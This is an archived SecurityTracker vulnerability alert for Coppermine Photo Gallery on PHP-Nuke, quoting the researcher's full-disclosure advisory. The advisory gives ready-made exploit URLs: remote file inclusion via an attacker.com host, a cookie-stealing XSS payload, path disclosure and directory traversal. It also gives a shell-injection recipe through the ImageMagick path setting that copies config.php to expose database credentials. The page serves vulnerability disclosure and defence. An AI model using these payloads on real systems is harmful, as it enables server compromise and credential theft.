SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Multimedia)  >   Coppermine Photo Gallery Vendors:   DEMAR, Gregory
Coppermine Photo Gallery Include File Flaw Lets Remote Users Execute Arbitrary Code on the Target System
SecurityTracker Alert ID:  1010001
SecurityTracker URL:  http://securitytracker.com/id/1010001
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 30 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.2.2b, 1.2.0 RC4
Description:   Several vulnerabilities were reported in Coppermine Photo Gallery. A remote user can execute arbitrary PHP code on the target system, conduct cross-site scripting attacks, and determine the installation path.

Janek Vind "waraxe" reported that the software includes a PHP file without validating the source of the file. As a result, a remote user can supply a specially crafted URL to cause the target server to include and execute a remote file. The PHP code in the file (including operating system commands) will execute on the target system with the privileges of the target web service.

In version 1.2.0 RC4, the 'init.inc.php' file will reportedly include the '/include/functions.inc.php' file from a remote location if the 'CPG_M_DIR' variable points to the remote location. A demonstration exploit URL is provided:

http://localhost/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker.com

In version 1.2.2b, the 'theme.php' filewill reportedly include the '/user_list_info_box.inc' file if the 'THEME_DIR' variable points to a remote location. Some demonstration exploit URLs are provided:

http://localhost/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker.com

It is also reported that several scripts will disclose the installation path to remote users. Some demonstration exploit URLs are provided:

http://localhost/nuke72/modules/coppermine/phpinfo.php
http://localhost/nuke72/modules/coppermine/addpic.php
http://localhost/nuke72/modules/coppermine/config.php
http://localhost/nuke72/modules/coppermine/db_input.php
http://localhost/nuke72/modules/coppermine/displayecard.php
http://localhost/nuke72/modules/coppermine/ecard.php
http://localhost/nuke72/modules/coppermine/include/crop.inc.php

It is also reported that version 1.2.2b does not properly filter HTML code from user-supplied input in the CPG_URL variable. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Coppermine Photo Gallery software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar">[xss
code here]
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>

It is also reported that a remote authenticated user with PHP-Nuke administrative privileges can view the PHP-Nuke directory structure with the following type of URL:

http://localhost/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../..

It is also reported that a remote authenticated user with PHP-Nuke administrative privileges can execute arbitrary shell commands by submitting specially crafted 'impath' and 'jpeg_qual' configuration parameters. A demonstration exploit method is described in the Source Message.

Impact:   A remote user can execute arbitrary PHP code, including operating system commands, on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Coppermine Photo Gallery software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can determine the installation path.

A remote authenticated user with PHP-Nuke administrative privileges can view directories and execute arbitrary shell commands on the target system.

Solution:   No solution was available at the time of this entry.
Vendor URL:  coppermine.sourceforge.net/ (Links to External Site)
Cause:   Access control error, Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Fri, 30 Apr 2004 09:37:40 -0700 (PDT)
Subject:  [Full-Disclosure] [waraxe-2004-SA#026 - Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke]




{================================================================================}
{                              [waraxe-2004-SA#026]   
                          }
{================================================================================}
{                                                     
                          }
{     [ Multiple vulnerabilities in Coppermine Photo
Gallery for PhpNuke ]       }
{                                                     
                          }
{================================================================================}
                                                      
                                                      
                  
Author: Janek Vind "waraxe"
Date: 29. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=26


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Coppermine Photo Gallery 1.2.2b for CMS
Copyright (C) 2002,2003  Grégory DEMAR
<gdemar@wanadoo.fr>
http://www.chezgreg.net/coppermine/  
Updated by the Coppermine Dev Team 
http://coppermine.sf.net/team/
New Port by GoldenTroll
http://coppermine.findhere.org/
Based on coppermine 1.1d by Surf
http://www.surf4all.net/
http://coppermine.findhere.org

I have tested two versions of the Coppermine: 1.2.2b
and 1.2.0 RC4, which i will name
further as "new version" and "old version".


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

Many scripts in Coppermine software package are not
protected against direct access,
therefore standard php error messages can be provoked,
which leads to exposure the full
path to the scripts. Such piece of information has
great value for potential attacker, who
will use this in next steps of hacking.

Version scope: both new and old versions are affected.

Examples:

http://localhost/nuke72/modules/coppermine/phpinfo.php
http://localhost/nuke72/modules/coppermine/addpic.php
http://localhost/nuke72/modules/coppermine/config.php
http://localhost/nuke72/modules/coppermine/db_input.php
http://localhost/nuke72/modules/coppermine/displayecard.php
http://localhost/nuke72/modules/coppermine/ecard.php
http://localhost/nuke72/modules/coppermine/include/crop.inc.php



B. Cross-site scripting aka XSS:

Can be used by potential attacker for stealing cookies
and doing other operations, which in
normal conditions are not permitted by browser's
cross-domain security restrictions.

Version scope: only new version is affected.

Examples:

http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar">[xss
code here]
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>


C. Arbitrary directory browsing (needs nuke admin
rights!):

PhpNuke is known by the many security bugs, leading to
admin account overtaking by attacker.
So needing of the admin rights to use this exploit is
not such big restriction ...

Version scope: both new and old versions are affected.

Example:

http://localhost/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../..

... and we can see PhpNuke's root directory structure
;)


D. Execution of the arbitrary shell commands in server
(needs nuke admin rights!):

Yes, again we need PhpNuke admin privileges to
accomplish this exploit, but as said before,
there are many ways to compromise nuke's admin
account.

Version scope: both new and old versions are affected.

So, how we can give any shell commands to server?
Let's look at Coppermine's original source in
"coppermine/include/picmgmtbatch.inc.php":


// Method for thumbnails creation
    switch ($method) {
        case "im" :
          if (preg_match("#[A-Z]:|\\\\#Ai", __FILE__))
{
            // get the basedir, remove '/include'
            $cur_dir = "";
            $src_file = '"' . strtr($src_file, '/',
'\\') . '"';
            $im_dest_file = str_replace('%', '%%',
('"' . strtr($dest_file, '/', '\\') . '"'));
          } else {
            $src_file = escapeshellarg($src_file);
            $im_dest_file = str_replace('%', '%%',
escapeshellarg($dest_file));
          }

          $output = array();
          $cmd = "{$CONFIG['impath']}convert -quality
{$CONFIG['jpeg_qual']} {$CONFIG['im_options']}
-geometry {$destWidth}x{$destHeight} $src_file
$im_dest_file";
          
		  //die("$cmd");
		  
		  exec ($cmd, $output, $retval);

          if ($retval) {
            $ERROR = "Error executing ImageMagick -
Return value: $retval";
            if ($CONFIG['debug_mode']) {

As we can see, there is very dangerous php function
"exec()" in use and some user input -
variables "$src_file" and "$dest_file" - are sanitized
by "escapeshellarg()". All seems to be ok?
Yes... oops... what about config variables
"$CONFIG['impath']", "$CONFIG['jpeg_qual']" etc ?
Coppermine's authors were assuming, that those
variables are safe to use directly in "exec()"...
But if we have nuke admin rights, we can manipulate
those configuration parameters and therefore
various shell commands can be injected to "exec()"!
You wanna details? Go to Coopermine's conficuration
panel and set "Method for resizing images" to
"Image Magick". Next set "Path to ImageMagick" to
value, which includes shell command, you want to
execute in server.
Example "path" in case of windows server: "type
config.php > config.txt &" ,
linux server: "cat config.php > config.txt ;" .
Now "save new configuration", then upload some
pictures to server and go to "Batch add pictures".
And if all went right, then you will see "config.txt"
file in phpnuke root directory, so anyone can
see in plaintext information with critical value -
database name, username and password ;)
Of course, skilled attacker can within 5 minutes get
remote shell running in server through
arbitrary port (higher than 1024) and next hacking is
not logged anymore, because webserver is bypassed.
One more step - finding and using local r00t exploit -
and server is 0wned ;)


E. Remote file inclusion:

Version scope: both new and old versions are affected
(different bugs in different scripts).

There exists remote file inclusion vulnerabilities in
Coppermine Photo Gallery, which
can lead to arbitrary php code parsing, shell commands
injection, etc. And as discussed before,
finally this can lead to total compromise of the
victim server.

E1 - affected is old version: 

First get ready your php script in
"http://attacker.com/include/functions.inc.php" and
then:

http://localhost/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker.com



E2 - affected is new version:

First get ready your php script in
"http://attacker.com/user_list_info_box.inc" and then:

http://localhost/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker.com

Of course, attacker's server, where those scripts are,
must NOT PARSE PHP!!

See ya!


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum members and to all bugtraq
readers in Estonia! Tervitused!
Special greets to http://www.gamecheaters.us staff!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ]
------------------------------------



	
		
__________________________________
Do you Yahoo!?
Win a $20,000 Career Makeover at Yahoo! HotJobs  
http://hotjobs.sweepstakes.yahoo.com/careermakeover 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2017, SecurityGlobal.net LLC